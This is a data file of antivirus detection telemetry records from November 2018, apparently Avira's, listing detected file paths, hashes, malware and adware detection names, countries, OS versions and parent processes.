  Row(detection=Row(filename='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C57193F15573E83F389017CF356E4F64A787D7F7842ABE054711CC09234D2054', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='c57193f15573e83f389017cf356e4f64a787d7f7842abe054711cc09234d2054', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:52:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rpy4kp6', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RPY4KP6', filesize=64000, name='VBA/Dldr.Agent.ukfca.#M1.#R1'), hash='e36e75dc2e68b52b64518fedb0641a32758662510897b223b1f61d7263ae0a4e', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091838-a65a6cbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-091838-A65A6CBB', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-232945-eff7dace', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09479a50\\AVSCAN-20181101-232059-A9CB4FEB\\AVSCAN-20181101-232945-EFF7DACE', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='e3846c1077ae67fbb7d6358665a259a746c8130fa61aedbda814c5322fb633d5', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:28:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e62a51acdaef5edb473b510bd32ff151640ddb4bcf0b1e20cbd1c09be76ad605', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E62A51ACDAEF5EDB473B510BD32FF151640DDB4BCF0B1E20CBD1C09BE76AD605', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e62a51acdaef5edb473b510bd32ff151640ddb4bcf0b1e20cbd1c09be76ad605', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:18:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162006-46f70a1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-162006-46F70A1F', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:50:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182642-3a917773', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182642-3A917773', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vfqyqfls.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\VFqYQfls.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='92e65e29a7b1cbbc547c8117191019d3d0e6c9040582295d08ae1dbdef0ed7c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\92E65E29A7B1CBBC547C8117191019D3D0E6C9040582295D08AE1DBDEF0ED7C8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92e65e29a7b1cbbc547c8117191019d3d0e6c9040582295d08ae1dbdef0ed7c8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150111-9a116aea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150111-9A116AEA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Cybereason\\RansomFree\\CybereasonRansomFreeServiceHost.exe', parentsize=13824, timestamp='2018-11-01T23:54:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134451-884bdefc', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134451-884BDEFC', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.gh', filepath='C:\\Users\\X\\AppData\\Local\\GamerHash\\miners\\ewbf_v1\\miner.gh', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\GamerHash\\1.22.11\\GamerHash.exe', parentsize=2200024, timestamp='2018-11-04T07:31:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211204-b63a90c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-211204-B63A90C6', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:12:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201148-85d94314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1db55729\\AVSCAN-20181104-200946-7637165F\\AVSCAN-20181104-201148-85D94314', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:11:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001216-6c91765a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001216-6C91765A', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:42:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:01:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225349-03e6f4ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201154-631B45A0\\AVSCAN-20181104-225349-03E6F4AE', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:53:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f0f6', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f0f6', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:21:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eicfg_remover.exe', filepath='D:\\برامج\\WinSetupFromUSB-1-4\\files\\tools\\winisoutils\\eicfg_remover.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='9cba6504cd86e5e82780453c49cf9ceebd97f138ab5c45db00b05dd08a80ef74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T17:17:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124131-cdeba662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a3c66a4\\AVSCAN-20181104-124102-C9CDE2DF\\AVSCAN-20181104-124131-CDEBA662', filesize=28000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='791f8f05505d197b2913104c716adfa3a4faa46591e05845ef3e535b415a405d', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:41:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243dc', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243dc', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='\\\\\\/flags:0x0', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-04T19:57:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230245-4531e1b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202554-C98B3607\\AVSCAN-20181104-230245-4531E1B2', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:02:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161845-d160ee59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ad892021\\AVSCAN-20181104-161816-CD8BBCA4\\AVSCAN-20181104-161845-D160EE59', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:18:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345898.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345898.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:19:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-105930-4caed5fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14c95ccb\\AVSCAN-20181104-105648-39E14E6B\\AVSCAN-20181104-105930-4CAED5FE', filesize=14360000, name='PUA/Systweak.#M1.#R1'), hash='26e89330408d7767d0c79c705d1fa66beef31e3841edb1f338ebb4f15237cc1b', metadata=Row(cmdline=None, country='IE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T08:50:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T10:05:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='buarce.dll', filepath='C:\\buarce.dll', filesize=320000, name='TR/Black.Gen2.#M300.#R100338'), hash='670bff234695af106e636b007dce6a265ee6fd7a9dab5bc9b3852a6f86f7a37c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:04:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001e7ae', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001e7ae', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:18:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='overdos.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DRa0.756\\Hackpack\\Denial of Service\\OverDoS.exe', filesize=384000, name='HEUR/AGEN.1005124.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Ultimate HackPack.rar\\\\\\"', country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1500560, timestamp='2018-11-04T12:30:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:46:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setupara.dll', filepath='\\\\?\\C:\\SWTOOLS\\DRIVERS\\WLAN\\8m03lc36g03\\XP\\x32\\Install\\Lang\\SetupARA.dll', filesize=1692000, name='W32/Ramnit.C.#M1.#R1'), hash='2f26a733bd982f57845c915e93b5b56e28d33cc0ca810ef389e3a23cd9a3c6de', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:36:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fi254014.exe', filepath='H:\\Sicherung\\O&O DiskRecovery\\EXE\\FI254014.EXE', filesize=512000, name='HEUR/AGEN.1028602.#M1.#R1'), hash='d0de5a635bc6019a43c74707634fcf07f7e1a5b3157b220da744ca3857e8e7c6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T13:57:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220057-ea2c90b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220057-EA2C90B6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:46:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\program files\\rhino 6\\system\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:02:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Database\\Prog_LPD\\Prog_LPD\\Exeprog-mdk\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='2aaf973a1db9053aef93ccc6e4786f612ccebafb0d1401c893f08a160db5afbf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:31:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='search provided by bing moled', filepath='C:\\Windows\\System32\\Tasks\\Search Provided by Bing moled', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='780e043b1976c6be79409f30a9b67d3d2a888119d814a915e73712acda1b0ccc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T16:09:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142621-dbcc99bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5964c17\\AVSCAN-20181104-141526-5A93CEC8\\AVSCAN-20181104-142621-DBCC99BC', filesize=3712000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='078e9a6ae1ed2b2ef178f7bbb12a0a04ba629e1fce6313436d1b806df237491c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210022-5bcc4126', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210022-5BCC4126', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:52:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='.trashes.exe', filepath='G:\\.Trashes.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BC88EDE548E518B9EC21A4C08C9E22585854D33140901AFADD69A5584A4BE9D4', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='bc88ede548e518b9ec21a4c08c9e22585854d33140901afadd69a5584a4be9d4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:02:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:16:24Z'), dt=datetime.date(2018, 11, 4)),
